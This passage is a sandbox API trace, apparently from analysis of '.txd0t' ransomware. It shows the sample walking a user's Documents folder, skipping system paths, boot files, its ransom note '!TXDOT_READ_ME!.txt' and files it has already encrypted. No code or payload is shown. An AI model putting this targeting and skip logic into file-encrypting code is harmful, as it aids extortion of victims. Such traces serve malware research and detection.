[0129.202] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\system\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\local\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\boot\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\perflogs\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\programdata\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\drivers\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\wsus\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="crypt_detect") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="cryptolocker") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="ransomware") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\WINDOWS") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.203] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Outlook Files", lpSrch="C:\\Program Files") returned 0x0 [0129.203] GetProcessHeap () returned 0xe30000 [0129.203] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d0) returned 0xed90d0 [0129.203] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0129.203] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\*", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*" [0129.203] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.203] StrCmpW (psz1=".", psz2=".") returned 0 [0129.203] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa73182d0, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0x517427ed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.203] StrCmpW (psz1="..", psz2=".") returned 1 [0129.203] StrCmpW (psz1="..", psz2="..") returned 0 [0129.203] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x516d0a53, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x516d0a53, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5171c524, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.204] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.204] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.204] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0129.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0129.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\!TXDOT_READ_ME!.txt" [0129.204] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.204] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.204] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.204] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 1 [0129.204] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2=".") returned 1 [0129.204] StrCmpW (psz1="kkcie@kdj.kd.pst.txd0t", psz2="..") returned 1 [0129.204] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Documents\\Outlook Files", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files" [0129.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files", psz2="\\", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\" [0129.204] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\", psz2="kkcie@kdj.kd.pst.txd0t", cchMax=1104 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\Outlook Files\\kkcie@kdj.kd.pst.txd0t" [0129.204] PathFindExtensionW (pszPath="kkcie@kdj.kd.pst.txd0t") returned=".txd0t" [0129.204] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.204] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa736477a, ftCreationTime.dwHighDateTime=0x1d327c8, ftLastAccessTime.dwLowDateTime=0xa736477a, ftLastAccessTime.dwHighDateTime=0x1d327c8, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x42600, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="kkcie@kdj.kd.pst.txd0t", cAlternateFileName="KKCIE@~1.TXD")) returned 0 [0129.204] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.204] GetProcessHeap () returned 0xe30000 [0129.204] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.204] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a10cb0, ftCreationTime.dwHighDateTime=0x1d5b064, ftLastAccessTime.dwLowDateTime=0x8f772f70, ftLastAccessTime.dwHighDateTime=0x1d5c4c2, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7d58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QQnuWmakq.docx.txd0t", cAlternateFileName="QQNUWM~1.TXD")) returned 1 [0129.205] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2=".") returned 1 [0129.205] StrCmpW (psz1="QQnuWmakq.docx.txd0t", psz2="..") returned 1 [0129.205] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="QQnuWmakq.docx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\QQnuWmakq.docx.txd0t" [0129.205] PathFindExtensionW (pszPath="QQnuWmakq.docx.txd0t") returned=".txd0t" [0129.205] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.205] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87e473b0, ftCreationTime.dwHighDateTime=0x1d5f07a, ftLastAccessTime.dwLowDateTime=0xe5de8050, ftLastAccessTime.dwHighDateTime=0x1d58ea5, ftLastWriteTime.dwLowDateTime=0x516a9e83, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xea4e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="quCysrsmVF.pptx.txd0t", cAlternateFileName="QUCYSR~1.TXD")) returned 1 [0129.205] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2=".") returned 1 [0129.205] StrCmpW (psz1="quCysrsmVF.pptx.txd0t", psz2="..") returned 1 [0129.205] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="quCysrsmVF.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\quCysrsmVF.pptx.txd0t" [0129.205] PathFindExtensionW (pszPath="quCysrsmVF.pptx.txd0t") returned=".txd0t" [0129.205] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.205] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab726a00, ftCreationTime.dwHighDateTime=0x1d5ef97, ftLastAccessTime.dwLowDateTime=0x2fc4f790, ftLastAccessTime.dwHighDateTime=0x1d5e364, ftLastWriteTime.dwLowDateTime=0x516d0a53, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x119cb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sA2u-LPe-LiGoMos.pdf.txd0t", cAlternateFileName="SA2U-L~1.TXD")) returned 1 [0129.205] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2=".") returned 1 [0129.205] StrCmpW (psz1="sA2u-LPe-LiGoMos.pdf.txd0t", psz2="..") returned 1 [0129.205] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="sA2u-LPe-LiGoMos.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\sA2u-LPe-LiGoMos.pdf.txd0t" [0129.205] PathFindExtensionW (pszPath="sA2u-LPe-LiGoMos.pdf.txd0t") returned=".txd0t" [0129.205] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.205] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bd450c0, ftCreationTime.dwHighDateTime=0x1d5ea9b, ftLastAccessTime.dwLowDateTime=0xb5159f50, ftLastAccessTime.dwHighDateTime=0x1d5f00a, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcf06, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="spmR iwVLu JE 9B.rtf.txd0t", cAlternateFileName="SPMRIW~1.TXD")) returned 1 [0129.205] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2=".") returned 1 [0129.205] StrCmpW (psz1="spmR iwVLu JE 9B.rtf.txd0t", psz2="..") returned 1 [0129.205] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.205] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="spmR iwVLu JE 9B.rtf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\spmR iwVLu JE 9B.rtf.txd0t" [0129.205] PathFindExtensionW (pszPath="spmR iwVLu JE 9B.rtf.txd0t") returned=".txd0t" [0129.205] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.205] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa71682a0, ftCreationTime.dwHighDateTime=0x1d5e783, ftLastAccessTime.dwLowDateTime=0x4ecffce0, ftLastAccessTime.dwHighDateTime=0x1d5e1c8, ftLastWriteTime.dwLowDateTime=0x516f62d9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf00c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="U8_NH2Y.pdf.txd0t", cAlternateFileName="U8_NH2~1.TXD")) returned 1 [0129.205] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2=".") returned 1 [0129.205] StrCmpW (psz1="U8_NH2Y.pdf.txd0t", psz2="..") returned 1 [0129.206] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="U8_NH2Y.pdf.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\U8_NH2Y.pdf.txd0t" [0129.206] PathFindExtensionW (pszPath="U8_NH2Y.pdf.txd0t") returned=".txd0t" [0129.206] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.206] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x74e48d30, ftCreationTime.dwHighDateTime=0x1d5e4fa, ftLastAccessTime.dwLowDateTime=0x94f1d180, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x517427ed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xedec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cAlternateFileName="UGOWYR~1.TXD")) returned 1 [0129.206] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2=".") returned 1 [0129.206] StrCmpW (psz1="UgOWYrVuYDiW8pkWKYl.xls.txd0t", psz2="..") returned 1 [0129.206] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="UgOWYrVuYDiW8pkWKYl.xls.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\UgOWYrVuYDiW8pkWKYl.xls.txd0t" [0129.206] PathFindExtensionW (pszPath="UgOWYrVuYDiW8pkWKYl.xls.txd0t") returned=".txd0t" [0129.206] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.206] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8695d80, ftCreationTime.dwHighDateTime=0x1d5e7fb, ftLastAccessTime.dwLowDateTime=0xb960170, ftLastAccessTime.dwHighDateTime=0x1d5e567, ftLastWriteTime.dwLowDateTime=0x51d84a4b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1009d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cAlternateFileName="UT8OAM~1.TXD")) returned 1 [0129.206] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2=".") returned 1 [0129.206] StrCmpW (psz1="ut8OaMa5zK99bj4EvRQ.csv.txd0t", psz2="..") returned 1 [0129.206] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="ut8OaMa5zK99bj4EvRQ.csv.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\ut8OaMa5zK99bj4EvRQ.csv.txd0t" [0129.206] PathFindExtensionW (pszPath="ut8OaMa5zK99bj4EvRQ.csv.txd0t") returned=".txd0t" [0129.206] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.206] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcea6c390, ftCreationTime.dwHighDateTime=0x1d5ed80, ftLastAccessTime.dwLowDateTime=0x860206d0, ftLastAccessTime.dwHighDateTime=0x1d5e43f, ftLastWriteTime.dwLowDateTime=0x518c002b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x3345, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yvlM_ciBT0jsrUW.pptx.txd0t", cAlternateFileName="YVLM_C~1.TXD")) returned 1 [0129.206] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2=".") returned 1 [0129.206] StrCmpW (psz1="yvlM_ciBT0jsrUW.pptx.txd0t", psz2="..") returned 1 [0129.206] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="yvlM_ciBT0jsrUW.pptx.txd0t", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t") returned="C:\\Users\\FD1HVy\\Documents\\yvlM_ciBT0jsrUW.pptx.txd0t" [0129.206] PathFindExtensionW (pszPath="yvlM_ciBT0jsrUW.pptx.txd0t") returned=".txd0t" [0129.206] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.206] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4b82510, ftCreationTime.dwHighDateTime=0x1d5ea83, ftLastAccessTime.dwLowDateTime=0x519cafed, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x519cafed, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Z5Oif6_Mr_Ui", cAlternateFileName="Z5OIF6~1")) returned 1 [0129.206] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2=".") returned 1 [0129.206] StrCmpW (psz1="Z5Oif6_Mr_Ui", psz2="..") returned 1 [0129.206] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Documents", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents", psz2="\\", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\") returned="C:\\Users\\FD1HVy\\Documents\\" [0129.206] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Documents\\", psz2="Z5Oif6_Mr_Ui", cchMax=1076 | out: psz1="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui") returned="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui" [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system32\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\system\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\local\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\boot\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\perflogs\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\programdata\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\drivers\\") returned 0x0 [0129.207] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Documents\\Z5Oif6_Mr_Ui", lpSrch=":\\wsus\\") returned 0x0 [0129.207] StrStrIW 